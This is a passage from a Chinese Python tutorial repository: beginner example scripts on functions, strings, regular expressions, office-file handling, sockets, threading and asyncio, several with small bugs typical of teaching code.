% self.name) def main(): stu1 = Student('骆昊', 38) stu1.study('Python程序设计') stu1.watch_av() stu2 = Student('王大锤', 15) stu2.study('思想品德') stu2.watch_av() if __name__ == '__main__': main() File: Day01-15/code/Day06/function6.py """ 作用域问题 Version: 0.1 Author: 骆昊 Date: 2018-03-05 """ # 局部作用域 def foo1(): a = 5 foo1() # print(a) # NameError # 全局作用域 b = 10 def foo2(): print(b) foo2() def foo3(): b = 100 # 局部变量 print(b) foo3() print(b) def foo4(): global b b = 200 # 全局变量 print(b) foo4() print(b) File: Day01-15/code/Day06/function2.py """ 函数的定义和使用 - 求最大公约数和最小公倍数 Version: 0.1 Author: 骆昊 Date: 2018-03-05 """ def gcd(x, y): if x > y: (x, y) = (y, x) for factor in range(x, 1, -1): if x % factor == 0 and y % factor == 0: return factor return 1 def lcm(x, y): return x * y // gcd(x, y) print(gcd(15, 27)) print(lcm(15, 27)) File: Day01-15/code/Day06/function3.py """ Python的内置函数 - 数学相关: abs / divmod / pow / round / min / max / sum - 序列相关: len / range / next / filter / map / sorted / slice / reversed - 类型转换: chr / ord / str / bool / int / float / complex / bin / oct / hex - 数据结构: dict / list / set / tuple - 其他函数: all / any / id / input / open / print / type Version: 0.1 Author: 骆昊 Date: 2018-03-05 """ def myfilter(mystr): return len(mystr) == 6 # help() print(chr(0x9a86)) print(hex(ord('骆'))) print(abs(-1.2345)) print(round(-1.2345)) print(pow(1.2345, 5)) fruits = ['orange', 'peach', 'durian', 'watermelon'] print(fruits[slice(1, 3)]) fruits2 = list(filter(myfilter, fruits)) print(fruits) print(fruits2) File: Day01-15/code/Day06/function4.py """ Python常用模块 - 运行时服务相关模块: copy / pickle / sys / ... - 数学相关模块: decimal / math / random / ... - 字符串处理模块: codecs / re / ... - 文件处理相关模块: shutil / gzip / ... - 操作系统服务相关模块: datetime / os / time / logging / io / ... - 进程和线程相关模块: multiprocessing / threading / queue - 网络应用相关模块: ftplib / http / smtplib / urllib / ... - Web编程相关模块: cgi / webbrowser - 数据处理和编码模块: base64 / csv / html.parser / json / xml / ... Version: 0.1 Author: 骆昊 Date: 2018-03-05 """ import time import shutil import os seconds = time.time() print(seconds) localtime = time.localtime(seconds) print(localtime) print(localtime.tm_year) print(localtime.tm_mon) print(localtime.tm_mday) asctime = time.asctime(localtime) print(asctime) strtime = time.strftime('%Y-%m-%d %H:%M:%S', localtime) print(strtime) mydate = time.strptime('2018-1-1', '%Y-%m-%d') print(mydate) shutil.copy('/Users/Hao/hello.py', '/Users/Hao/Desktop/first.py') os.system('ls -l') os.chdir('/Users/Hao') os.system('ls -l') os.mkdir('test') File: Day01-15/code/Day06/function5.py """ 函数的参数 - 位置参数 - 可变参数 - 关键字参数 - 命名关键字参数 Version: 0.1 Author: 骆昊 Date: 2018-03-05 """ # 参数默认值 def f1(a, b=5, c=10): return a + b * 2 + c * 3 print(f1(1, 2, 3)) print(f1(100, 200)) print(f1(100)) print(f1(c=2, b=3, a=1)) # 可变参数 def f2(*args): sum = 0 for num in args: sum += num return sum print(f2(1, 2, 3)) print(f2(1, 2, 3, 4, 5)) print(f2()) # 关键字参数 def f3(**kw): if 'name' in kw: print('欢迎你%s!' % kw['name']) elif 'tel' in kw: print('你的联系电话是: %s!' % kw['tel']) else: print('没找到你的个人信息!') param = {'name': '骆昊', 'age': 38} f3(**param) f3(name='骆昊', age=38, tel='13866778899') f3(user='骆昊', age=38, tel='13866778899') f3(user='骆昊', age=38, mobile='13866778899') File: Day01-15/code/Day06/function1.py """ 函数的定义和使用 - 计算组合数C(7,3) Version: 0.1 Author: 骆昊 Date: 2018-03-05 """ # 将求阶乘的功能封装成一个函数 def factorial(n): result = 1 for num in range(1, n + 1): result *= num return result print(factorial(7) // factorial(3) // factorial(4)) File: Day01-15/code/Day01/hello.py """ 第一个Python程序 - hello, world! 
向伟大的Dennis M. Ritchie先生致敬 Version: 0.1 Author: 骆昊 Date: 2018-02-26 请将该文件命名为hello.py 使用Windows的小伙伴可以在命令行提示下通过下面的命令运行该程序 python hello.py 对于使用Linux或macOS的小伙伴可以打开终端并键入下面的命令来运行程序 python3 hello.py """ print('hello, world!') # print("你好,世界!") print('你好', '世界') print('hello', 'world', sep=', ', end='!') print('goodbye, world', end='!\n') File: Day01-15/code/Day01/flag.py """ 用Python的turtle模块绘制国旗 """ import turtle def draw_rectangle(x, y, width, height): """绘制矩形""" turtle.goto(x, y) turtle.pencolor('red') turtle.fillcolor('red') turtle.begin_fill() for i in range(2): turtle.forward(width) turtle.left(90) turtle.forward(height) turtle.left(90) turtle.end_fill() def draw_star(x, y, radius): """绘制五角星""" turtle.setpos(x, y) pos1 = turtle.pos() turtle.circle(-radius, 72) pos2 = turtle.pos() turtle.circle(-radius, 72) pos3 = turtle.pos() turtle.circle(-radius, 72) pos4 = turtle.pos() turtle.circle(-radius, 72) pos5 = turtle.pos() turtle.color('yellow', 'yellow') turtle.begin_fill() turtle.goto(pos3) turtle.goto(pos1) turtle.goto(pos4) turtle.goto(pos2) turtle.goto(pos5) turtle.end_fill() def main(): """主程序""" turtle.speed(12) turtle.penup() x, y = -270, -180 # 画国旗主体 width, height = 540, 360 draw_rectangle(x, y, width, height) # 画大星星 pice = 22 center_x, center_y = x + 5 * pice, y + height - pice * 5 turtle.goto(center_x, center_y) turtle.left(90) turtle.forward(pice * 3) turtle.right(90) draw_star(turtle.xcor(), turtle.ycor(), pice * 3) x_poses, y_poses = [10, 12, 12, 10], [2, 4, 7, 9] # 画小星星 for x_pos, y_pos in zip(x_poses, y_poses): turtle.goto(x + x_pos * pice, y + height - y_pos * pice) turtle.left(turtle.towards(center_x, center_y) - turtle.heading()) turtle.forward(pice) turtle.right(90) draw_star(turtle.xcor(), turtle.ycor(), pice) # 隐藏海龟 turtle.ht() # 显示绘图窗口 turtle.mainloop() if __name__ == '__main__': main() File: Day01-15/code/Day01/peppa_pig.py """ 绘制小猪佩奇 """ from turtle import * def nose(x,y): """画鼻子""" penup() # 将海龟移动到指定的坐标 goto(x,y) pendown() # 设置海龟的方向(0-东、90-北、180-西、270-南) setheading(-30) begin_fill() a = 0.4 for i in range(120): if 0 <= i < 30 or 60 <= i <90: a = a + 0.08 # 向左转3度 left(3) # 向前走 forward(a) else: a = a - 0.08 left(3) forward(a) end_fill() penup() setheading(90) forward(25) setheading(0) forward(10) pendown() # 设置画笔的颜色(红, 绿, 蓝) pencolor(255, 155, 192) setheading(10) begin_fill() circle(5) color(160, 82, 45) end_fill() penup() setheading(0) forward(20) pendown() pencolor(255, 155, 192) setheading(10) begin_fill() circle(5) color(160, 82, 45) end_fill() def head(x, y): """画头""" color((255, 155, 192), "pink") penup() goto(x,y) setheading(0) pendown() begin_fill() setheading(180) circle(300, -30) circle(100, -60) circle(80, -100) circle(150, -20) circle(60, -95) setheading(161) circle(-300, 15) penup() goto(-100, 100) pendown() setheading(-30) a = 0.4 for i in range(60): if 0<= i < 30 or 60 <= i < 90: a = a + 0.08 lt(3) #向左转3度 fd(a) #向前走a的步长 else: a = a - 0.08 lt(3) fd(a) end_fill() def ears(x,y): """画耳朵""" color((255, 155, 192), "pink") penup() goto(x, y) pendown() begin_fill() setheading(100) circle(-50, 50) circle(-10, 120) circle(-50, 54) end_fill() penup() setheading(90) forward(-12) setheading(0) forward(30) pendown() begin_fill() setheading(100) circle(-50, 50) circle(-10, 120) circle(-50, 56) end_fill() def eyes(x,y): """画眼睛""" color((255, 155, 192), "white") penup() setheading(90) forward(-20) setheading(0) forward(-95) pendown() begin_fill() circle(15) end_fill() color("black") penup() setheading(90) forward(12) setheading(0) forward(-3) pendown() begin_fill() circle(3) 
end_fill() color((255, 155, 192), "white") penup() seth(90) forward(-25) seth(0) forward(40) pendown() begin_fill() circle(15) end_fill() color("black") penup() setheading(90) forward(12) setheading(0) forward(-3) pendown() begin_fill() circle(3) end_fill() def cheek(x,y): """画脸颊""" color((255, 155, 192)) penup() goto(x,y) pendown() setheading(0) begin_fill() circle(30) end_fill() def mouth(x,y): """画嘴巴""" color(239, 69, 19) penup() goto(x, y) pendown() setheading(-80) circle(30, 40) circle(40, 80) def setting(): """设置参数""" pensize(4) # 隐藏海龟 hideturtle() colormode(255) color((255, 155, 192), "pink") setup(840, 500) speed(10) def main(): """主函数""" setting() nose(-100, 100) head(-69, 167) ears(0, 160) eyes(0, 140) cheek(80, 10) mouth(-20, 30) done() if __name__ == '__main__': main() File: Day01-15/code/Day12/str2.py """ 字符串常用操作 - 实现字符串倒转的方法 Version: 0.1 Author: 骆昊 Date: 2018-03-19 """ from io import StringIO def reverse_str1(str): return str[::-1] def reverse_str2(str): if len(str) <= 1: return str return reverse_str2(str[1:]) + str[0:1] def reverse_str3(str): # StringIO对象是Python中的可变字符串 # 不应该使用不变字符串做字符串连接操作 因为会产生很多无用字符串对象 rstr = StringIO() str_len = len(str) for index in range(str_len - 1, -1, -1): rstr.write(str[index]) return rstr.getvalue() def reverse_str4(str): return ''.join(str[index] for index in range(len(str) - 1, -1, -1)) def reverse_str5(str): # 将字符串处理成列表 str_list = list(str) str_len = len(str) # 使用zip函数将两个序列合并成一个产生元组的迭代器 # 每次正好可以取到一前一后两个下标来实现元素的交换 for i, j in zip(range(str_len // 2), range(str_len - 1, str_len // 2, -1)): str_list[i], str_list[j] = str_list[j], str_list[i] # 将列表元素连接成字符串 return ''.join(str_list) if __name__ == '__main__': str = 'I love Python' print(reverse_str1(str)) print(str) print(reverse_str2(str)) print(str) print(reverse_str3(str)) print(str) print(reverse_str4(str)) print(str) print(reverse_str5(str)) print(str) File: Day01-15/code/Day12/test4.py import re def main(): # 创建正则表达式对象 使用了前瞻和回顾来保证手机号前后不应该出现数字 pattern = re.compile(r'(?<=\D)(1[38]\d{9}|14[57]\d{8}|15[0-35-9]\d{8}|17[678]\d{8})(?=\D)') sentence = ''' 重要的事情说8130123456789遍,我的手机号是13512346789这个靓号, 不是15600998765,也是110或119,王大锤的手机号才是15600998765。 ''' # 查找所有匹配并保存到一个列表中 mylist = re.findall(pattern, sentence) print(mylist) print('--------华丽的分隔线--------') # 通过迭代器取出匹配对象并获得匹配的内容 for temp in pattern.finditer(sentence): print(temp.group()) print('--------华丽的分隔线--------') # 通过search函数指定搜索位置找出所有匹配 m = pattern.search(sentence) while m: print(m.group()) m = pattern.search(sentence, m.end()) if __name__ == '__main__': main() File: Day01-15/code/Day12/test5.py """ 不良内容过滤 """ import re def main(): sentence = '你丫是傻叉吗? 我操你大爷的. Fuck you.' 
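    # each alternative in the pattern matches one banned word (or any of its common
    # variant characters); re.sub() replaces every match with a single '*' and
    # re.IGNORECASE also catches the upper-case English words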
purified = re.sub('[操肏艹]|fuck|shit|傻[比屄逼叉缺吊屌]|煞笔', '*', sentence, flags=re.IGNORECASE) print(purified) if __name__ == '__main__': main() File: Day01-15/code/Day12/test3.py """ 验证输入用户名和QQ号是否有效并给出对应的提示信息 要求: 用户名必须由字母、数字或下划线构成且长度在6~20个字符之间 QQ号是5~12的数字且首位不能为0 """ import re def main(): username = input('请输入用户名: ') qq = input('请输入QQ号: ') m1 = re.match(r'^[0-9a-zA-Z_]{6,20}$', username) if not m1: print('请输入有效的用户名.') m2 = re.match(r'^[1-9]\d{4,11}$', qq) if not m2: print('请输入有效的QQ号.') if m1 and m2: print('你输入的信息是有效的!') if __name__ == '__main__': main() File: Day01-15/code/Day12/str1.py """ 字符串常用操作 Version: 0.1 Author: 骆昊 Date: 2018-03-19 """ import pyperclip # 转义字符 print('My brother\'s name is \'007\'') # 原始字符串 print(r'My brother\'s name is \'007\'') str = 'hello123world' print('he' in str) print('her' in str) # 字符串是否只包含字母 print(str.isalpha()) # 字符串是否只包含字母和数字 print(str.isalnum()) # 字符串是否只包含数字 print(str.isdecimal()) print(str[0:5].isalpha()) print(str[5:8].isdecimal()) list = ['床前明月光', '疑是地上霜', '举头望明月', '低头思故乡'] print('-'.join(list)) sentence = 'You go your way I will go mine' words_list = sentence.split() print(words_list) email = ' [email protected] ' print(email) print(email.strip()) print(email.lstrip()) # 将文本放入系统剪切板中 pyperclip.copy('老虎不发猫你当我病危呀') # 从系统剪切板获得文本 # print(pyperclip.paste()) File: Day01-15/code/Day15/word1.py """ 创建Word文件 Version: 0.1 Author: 骆昊 Date: 2018-03-26 """ File: Day01-15/code/Day15/pdf1.py """ 创建PDF文件 Version: 0.1 Author: 骆昊 Date: 2018-03-26 """ File: Day01-15/code/Day15/excel1.py """ 创建Excel文件 Version: 0.1 Author: 骆昊 Date: 2018-03-26 """ from openpyxl import Workbook from openpyxl.worksheet.table import Table, TableStyleInfo workbook = Workbook() sheet = workbook.active data = [ [1001, '白元芳', '男', '13123456789'], [1002, '白洁', '女', '13233445566'] ] sheet.append(['学号', '姓名', '性别', '电话']) for row in data: sheet.append(row) tab = Table(displayName="Table1", ref="A1:E5") tab.tableStyleInfo = TableStyleInfo( name="TableStyleMedium9", showFirstColumn=False, showLastColumn=False, showRowStripes=True, showColumnStripes=True) sheet.add_table(tab) workbook.save('./res/全班学生数据.xlsx') File: Day01-15/code/Day15/excel2.py """ 读取Excel文件 Version: 0.1 Author: 骆昊 Date: 2018-03-26 """ from openpyxl import load_workbook from openpyxl import Workbook workbook = load_workbook('./res/学生明细表.xlsx') print(workbook.sheetnames) sheet = workbook[workbook.sheetnames[0]] print(sheet.title) for row in range(2, 7): for col in range(65, 70): cell_index = chr(col) + str(row) print(sheet[cell_index].value, end='\t') print() File: Day01-15/code/Day15/pdf2.py """ 读取PDF文件 Version: 0.1 Author: 骆昊 Date: 2018-03-26 """ from PyPDF2 import PdfFileReader with open('./res/Python课程大纲.pdf', 'rb') as f: reader = PdfFileReader(f, strict=False) print(reader.numPages) if reader.isEncrypted: reader.decrypt('') current_page = reader.getPage(5) print(current_page) print(current_page.extractText()) File: Day01-15/code/Day15/pillow1.py """ 使用pillow操作图像 Version: 0.1 Author: 骆昊 Date: 2018-03-26 """ from PIL import Image img = Image.open('./res/guido.jpg') print(img.size) print(img.format) print(img.format_description) img.save('./res/guido.png') img2 = Image.open('./res/guido.png') img3 = img2.crop((335, 435, 430, 615)) for x in range(4): for y in range(5): img2.paste(img3, (95 * y , 180 * x)) img2.resize((img.size[0] // 2, img.size[1] // 2)) img2.rotate(90) img2.save('./res/guido2.png') File: Day01-15/code/Day15/word2.py """ 读取Word文件 Version: 0.1 Author: 骆昊 Date: 2018-03-26 """ from docx import Document doc = 
Document('./res/用函数还是用复杂的表达式.docx') print(len(doc.paragraphs)) print(doc.paragraphs[0].text) # print(doc.paragraphs[1].runs[0].text) content = [] for para in doc.paragraphs: content.append(para.text) print(''.join(content)) File: Day01-15/code/Day14/fileclient.py from socket import socket from json import loads from base64 import b64decode def main(): client = socket() client.connect(('192.168.1.2', 5566)) # 定义一个保存二进制数据的对象 in_data = bytes() # 由于不知道服务器发送的数据有多大每次接收1024字节 data = client.recv(1024) while data: # 将收到的数据拼接起来 in_data += data data = client.recv(1024) # 将收到的二进制数据解码成JSON字符串并转换成字典 # loads函数的作用就是将JSON字符串转成字典对象 my_dict = loads(in_data.decode('utf-8')) filename = my_dict['filename'] filedata = my_dict['filedata'].encode('utf-8') with open('/Users/Hao/' + filename, 'wb') as f: # 将base64格式的数据解码成二进制数据并写入文件 f.write(b64decode(filedata)) print('图片已保存.') if __name__ == '__main__': main() File: Day01-15/code/Day14/chatserver.py from socket import socket from threading import Thread def main(): class ClientHandler(Thread): def __init__(self, client): super().__init__() self._client = client def run(self): try: while True: try: data = self._client.recv(1024) if data.decode('utf-8') == 'byebye': clients.remove(self._client) self._client.close() break else: for client in clients: client.send(data) except Exception as e: print(e) clients.remove(self._client) break except Exception as e: print(e) server = socket() server.bind(('10.7.189.118', 12345)) server.listen(512) clients = [] while True: curr_client, addr = server.accept() print(addr[0], '连接到服务器.') clients.append(curr_client) ClientHandler(curr_client).start() if __name__ == '__main__': main() File: Day01-15/code/Day14/fileserver.py from socket import socket, SOCK_STREAM, AF_INET from base64 import b64encode from json import dumps from threading import Thread def main(): # 自定义线程类 class FileTransferHandler(Thread): def __init__(self, cclient): super().__init__() self.cclient = cclient def run(self): my_dict = {} my_dict['filename'] = 'guido.jpg' # JSON是纯文本不能携带二进制数据 # 所以图片的二进制数据要处理成base64编码 my_dict['filedata'] = data # 通过dumps函数将字典处理成JSON字符串 json_str = dumps(my_dict) # 发送JSON字符串 self.cclient.send(json_str.encode('utf-8')) self.cclient.close() # 1.创建套接字对象并指定使用哪种传输服务 server = socket() # 2.绑定IP地址和端口(区分不同的服务) server.bind(('192.168.1.2', 5566)) # 3.开启监听 - 监听客户端连接到服务器 server.listen(512) print('服务器启动开始监听...') with open('guido.jpg', 'rb') as f: # 将二进制数据处理成base64再解码成字符串 data = b64encode(f.read()).decode('utf-8') while True: client, addr = server.accept() # 用一个字典(键值对)来保存要发送的各种数据 # 待会可以将字典处理成JSON格式在网络上传递 FileTransferHandler(client).start() if __name__ == '__main__': main() File: Day01-15/code/Day14/socket4.py """ 套接字 - 基于UDP协议创建Echo客户端 Version: 0.1 Author: 骆昊 Date: 2018-03-22 """ from socket import * client = socket(AF_INET, SOCK_DGRAM) while True: data_str = input('请输入: ') client.sendto(data_str.encode('utf-8'), ('localhost', 6789)) data, addr = client.recvfrom(1024) data_str = data.decode('utf-8') print('服务器回应:', data_str) if data_str == 'bye': break client.close() File: Day01-15/code/Day14/mmdownloader.py from time import time from threading import Thread import requests class DownloadHanlder(Thread): def __init__(self, url): super().__init__() self.url = url def run(self): filename = self.url[self.url.rfind('/') + 1:] resp = requests.get(self.url) with open('/Users/Hao/Downloads/' + filename, 'wb') as f: f.write(resp.content) def main(): # 通过requests模块的get函数获取网络资源 resp = requests.get( 
'http://api.tianapi.com/meinv/?key=772a81a51ae5c780251b1f98ea431b84&num=10') # 将服务器返回的JSON格式的数据解析为字典 data_model = resp.json() for mm_dict in data_model['newslist']: url = mm_dict['picUrl'] # 通过多线程的方式实现图片下载 DownloadHanlder(url).start() if __name__ == '__main__': main() File: Day01-15/code/Day14/chatclient.py from socket import socket from threading import Thread def main(): class RefreshScreenThread(Thread): def __init__(self, client): super().__init__() self._client = client def run(self): while running: data = self._client.recv(1024) print(data.decode('utf-8')) nickname = input('请输入你的昵称: ') myclient = socket() myclient.connect(('10.7.189.118', 12345)) running = True RefreshScreenThread(myclient).start() while running: content = input('请发言: ') if content == 'byebye': myclient.send(content.encode('utf-8')) running = False else: msg = nickname + ': ' + content myclient.send(msg.encode('utf-8')) if __name__ == '__main__': main() File: Day01-15/code/Day14/socket5.py """ 使用socketserver模块创建时间服务器 Version: 0.1 Author: 骆昊 Date: 2018-03-22 """ from socketserver import TCPServer, StreamRequestHandler from time import * class EchoRequestHandler(StreamRequestHandler): def handle(self): currtime = localtime(time()) timestr = strftime('%Y-%m-%d %H:%M:%S', currtime) self.wfile.write(timestr.encode('utf-8')) server = TCPServer(('localhost', 6789), EchoRequestHandler) server.serve_forever() File: Day01-15/code/Day14/socket1.py """ 套接字 - 基于TCP协议创建时间服务器 Version: 0.1 Author: 骆昊 Date: 2018-03-22 """ from socket import * from time import * server = socket(AF_INET, SOCK_STREAM) server.bind(('localhost', 6789)) server.listen() print('服务器已经启动正在监听客户端连接.') while True: client, addr = server.accept() print('客户端%s:%d连接成功.' % (addr[0], addr[1])) currtime = localtime(time()) timestr = strftime('%Y-%m-%d %H:%M:%S', currtime) client.send(timestr.encode('utf-8')) client.close() server.close() File: Day01-15/code/Day14/timeserver.py from socket import socket, SOCK_STREAM, AF_INET from datetime import datetime def main(): # 1.创建套接字对象并指定使用哪种传输服务 # family=AF_INET - IPv4地址 # family=AF_INET6 - IPv6地址 # type=SOCK_STREAM - TCP套接字 # type=SOCK_DGRAM - UDP套接字 # type=SOCK_RAW - 原始套接字 server = socket(family=AF_INET, type=SOCK_STREAM) # 2.绑定IP地址和端口(区分不同的服务) server.bind(('192.168.1.2', 6789)) # 3.开启监听 - 监听客户端连接到服务器 server.listen(512) print('服务器启动开始监听...') # 4.通过循环接收客户端的连接并作出相应的处理(提供服务) while True: # accept方法是一个阻塞方法如果没有客户端连接到服务器 # 这个方法就会阻塞代码不会向下执行 # accept方法返回元组其中的第一个元素是客户端对象 # 第二个元素是客户端的地址(由IP和端口两部分构成) client, addr = server.accept() print(str(addr) + '连接到了服务器.') # 5.发送数据 client.send(str(datetime.now()).encode('utf-8')) # 6.断开连接 client.close() if __name__ == '__main__': main() File: Day01-15/code/Day14/socket2.py """ 套接字 - 基于TCP协议创建时间客户端 Version: 0.1 Author: 骆昊 Date: 2018-03-22 """ from socket import * client = socket(AF_INET, SOCK_STREAM) client.connect(('localhost', 6789)) while True: data = client.recv(1024) if not data: break print(data.decode('utf-8')) client.close() File: Day01-15/code/Day14/socket3.py """ 套接字 - 基于UDP协议Echo服务器 Version: 0.1 Author: 骆昊 Date: 2018-03-22 """ from socket import * from time import * server = socket(AF_INET, SOCK_DGRAM) server.bind(('localhost', 6789)) while True: data, addr = server.recvfrom(1024) server.sendto(data, addr) server.close() File: Day01-15/code/Day14/timeclient.py from socket import socket def main(): client = socket() client.connect(('10.7.152.69', 6789)) print(client.recv(1024).decode('utf-8')) client.close() if __name__ == '__main__': main() File: Day01-15/code/Day13/multithread4.py """ 
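Running the slow download task in a separate daemon thread keeps the Tkinter main
loop responsive; the worker re-enables the download button and pops up a message
box when it finishes.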
使用多线程的情况 - 耗时间的任务在独立的线程中执行 Version: 0.1 Author: 骆昊 Date: 2018-03-20 """ import time import tkinter import tkinter.messagebox from threading import Thread def main(): class DownloadTaskHandler(Thread): def run(self): # 模拟下载任务需要花费10秒钟时间 time.sleep(10) tkinter.messagebox.showinfo('提示', '下载完成!') # 启用下载按钮 button1.config(state=tkinter.NORMAL) def download(): # 禁用下载按钮 button1.config(state=tkinter.DISABLED) # 通过daemon参数将线程设置为守护线程(主程序退出就不再保留执行) DownloadTaskHandler(daemon=True).start() def show_about(): tkinter.messagebox.showinfo('关于', '作者: 骆昊(v1.0)') top = tkinter.Tk() top.title('单线程') top.geometry('200x150') top.wm_attributes('-topmost', 1) panel = tkinter.Frame(top) button1 = tkinter.Button(panel, text='下载', command=download) button1.pack(side='left') button2 = tkinter.Button(panel, text='关于', command=show_about) button2.pack(side='right') panel.pack(side='bottom') tkinter.mainloop() if __name__ == '__main__': main() File: Day01-15/code/Day13/singlethread1.py """ 不使用多线程的情况 - 模拟多个下载任务 Version: 0.1 Author: 骆昊 Date: 2018-03-20 """ from random import randint from time import time, sleep def download_task(filename): print('开始下载%s...' % filename) time_to_download = randint(5, 10) sleep(time_to_download) print('下载完成! 耗费了%d秒' % time_to_download) def main(): start = time() download_task('Python从入门到住院.pdf') download_task('Peking Hot.avi') end = time() print('总共耗费了%.2f秒.' % (end - start)) if __name__ == '__main__': main() File: Day01-15/code/Day13/multithread1.py """ 使用多线程的情况 - 模拟多个下载任务 Version: 0.1 Author: 骆昊 Date: 2018-03-20 """ from random import randint from time import time, sleep import atexit import _thread def download_task(filename): print('开始下载%s...' % filename) time_to_download = randint(5, 10) print('剩余时间%d秒.' % time_to_download) sleep(time_to_download) print('%s下载完成!' % filename) def shutdown_hook(start): end = time() print('总共耗费了%.3f秒.' 
% (end - start)) def main(): start = time() # 将多个下载任务放到多个线程中执行 thread1 = _thread.start_new_thread(download_task, ('Python从入门到住院.pdf',)) thread2 = _thread.start_new_thread(download_task, ('Peking Hot.avi',)) # 注册关机钩子在程序执行结束前计算执行时间 atexit.register(shutdown_hook, start) if __name__ == '__main__': main() # 执行这里的代码会引发致命错误(不要被这个词吓到) 因为主线程结束后下载线程再想执行就会出问题 # 需要说明一下 由于_thread模块属于比较底层的线程操作而且不支持守护线程的概念 # 在实际开发中会有诸多不便 因此我们推荐使用threading模块提供的高级操作进行多线程编程 File: Day01-15/code/Day13/generator1.py """ 生成器 - 生成器语法 Version: 0.1 Author: 骆昊 Date: 2018-03-21 """ seq = [x * x for x in range(10)] print(seq) gen = (x * x for x in range(10)) print(gen) for x in gen: print(x) num = 10 gen = (x ** y for x, y in zip(range(1, num), range(num - 1, 0, -1))) print(gen) n = 1 while n < num: print(next(gen)) n += 1 File: Day01-15/code/Day13/multithread5.py """ 多个线程共享数据 - 没有锁的情况 Version: 0.1 Author: 骆昊 Date: 2018-03-20 """ from time import sleep from threading import Thread, Lock class Account(object): def __init__(self): self._balance = 0 self._lock = Lock() def deposit(self, money): # 先获取锁才能执行后续的代码 self._lock.acquire() try: new_balance = self._balance + money sleep(0.01) self._balance = new_balance finally: # 这段代码放在finally中保证释放锁的操作一定要执行 self._lock.release() @property def balance(self): return self._balance class AddMoneyThread(Thread): def __init__(self, account, money): super().__init__() self._account = account self._money = money def run(self): self._account.deposit(self._money) def main(): account = Account() threads = [] # 创建100个存款的线程向同一个账户中存钱 for _ in range(100): t = AddMoneyThread(account, 1) threads.append(t) t.start() # 等所有存款的线程都执行完毕∫ for t in threads: t.join() print('账户余额为: ¥%d元' % account.balance) if __name__ == '__main__': main() File: Day01-15/code/Day13/multiprocess1.py """ 使用Process类创建多个进程 Version: 0.1 Author: 骆昊 Date: 2018-03-20 """ # 通过下面程序的执行结果可以证实 父进程在创建子进程时复制了进程及其数据结构 # 每个进程都有自己独立的内存空间 所以进程之间共享数据只能通过IPC的方式 from multiprocessing import Process, Queue, current_process from time import sleep def sub_task(content, counts): print(f'PID: {current_process().pid}') counter = 0 while counter < counts: counter += 1 print(f'{counter}: {content}') sleep(0.01) def main(): number = random.randrange(5, 10) Process(target=sub_task, args=('Ping', number)).start() Process(target=sub_task, args=('Pong', number)).start() if __name__ == '__main__': main() File: Day01-15/code/Day13/asyncio1.py """ 异步I/O操作 - asyncio模块 Version: 0.1 Author: 骆昊 Date: 2018-03-21 """ import asyncio import threading # import time @asyncio.coroutine def hello(): print('%s: hello, world!' % threading.current_thread()) # 休眠不会阻塞主线程因为使用了异步I/O操作 # 注意有yield from才会等待休眠操作执行完成 yield from asyncio.sleep(2) # asyncio.sleep(1) # time.sleep(1) print('%s: goodbye, world!' % threading.current_thread()) loop = asyncio.get_event_loop() tasks = [hello(), hello()] # 等待两个异步I/O操作执行结束 loop.run_until_complete(asyncio.wait(tasks)) print('game over!') loop.close() File: Day01-15/code/Day13/coroutine1.py """ 使用协程 - 模拟快递中心派发快递 Version: 0.1 Author: 骆昊 Date: 2018-03-21 """ from time import sleep from random import random def build_deliver_man(man_id): total = 0 while True: total += 1 print('%d号快递员准备接今天的第%d单.' % (man_id, total)) pkg = yield print('%d号快递员收到编号为%s的包裹.' 
% (man_id, pkg)) sleep(random() * 3) def package_center(deliver_man, max_per_day): num = 1 deliver_man.send(None) # next(deliver_man) while num <= max_per_day: package_id = 'PKG-%d' % num deliver_man.send(package_id) num += 1 sleep(0.1) deliver_man.close() print('今天的包裹派送完毕!') dm = build_deliver_man(1) package_center(dm, 10) # 两个函数虽然没有调用关系但是创建快递员的函数作为一个协程协助了快递中心函数完成任务 # 想一想如果有多个快递员的时候应该如何处理 File: Day01-15/code/Day13/multiprocess4.py from time import time def main(): total = 0 number_list = [x for x in range(1, 100000001)] start = time() for number in number_list: total += number print(total) end = time() print('Execution time: %.3fs' % (end - start)) if __name__ == '__main__': main() File: Day01-15/code/Day13/test2.py import time from threading import Thread, Lock class Account(object): def __init__(self, balance=0): self._balance = balance self._lock = Lock() @property def balance(self): return self._balance def deposit(self, money): # 当多个线程同时访问一个资源的时候 就有可能因为竞争资源导致资源的状态错误 # 被多个线程访问的资源我们通常称之为临界资源 对临界资源的访问需要加上保护 if money > 0: self._lock.acquire() try: new_balance = self._balance + money time.sleep(0.01) self._balance = new_balance finally: self._lock.release() class AddMoneyThread(Thread): def __init__(self, account): super().__init__() self._account = account def run(self): self._account.deposit(1) def main(): account = Account(1000) tlist = [] for _ in range(100): t = AddMoneyThread(account) tlist.append(t) t.start() for t in tlist: t.join() print('账户余额: %d元' % account.balance) if __name__ == '__main__': main() File: Day01-15/code/Day13/asyncio2.py """ 异步I/O操作 - async和await Version: 0.1 Author: 骆昊 Date: 2018-03-21 """ import asyncio import threading # 通过async修饰的函数不再是普通函数而是一个协程 # 注意async和await将在Python 3.7中作为关键字出现 async def hello(): print('%s: hello, world!' % threading.current_thread()) await asyncio.sleep(2) print('%s: goodbye, world!' % threading.current_thread()) loop = asyncio.get_event_loop() tasks = [hello(), hello()] # 等待两个异步I/O操作执行结束 loop.run_until_complete(asyncio.wait(tasks)) loop.close() File: Day01-15/code/Day13/coroutine2.py """ 使用协程 - 查看协程的状态 Version: 0.1 Author: 骆昊 Date: 2018-03-21 """ from time import sleep from inspect import getgeneratorstate def build_deliver_man(man_id): total = 0 while True: total += 1 print('%d号快递员准备接今天的第%d单.' % (man_id, total)) pkg = yield print('%d号快递员收到编号为%s的包裹.' 
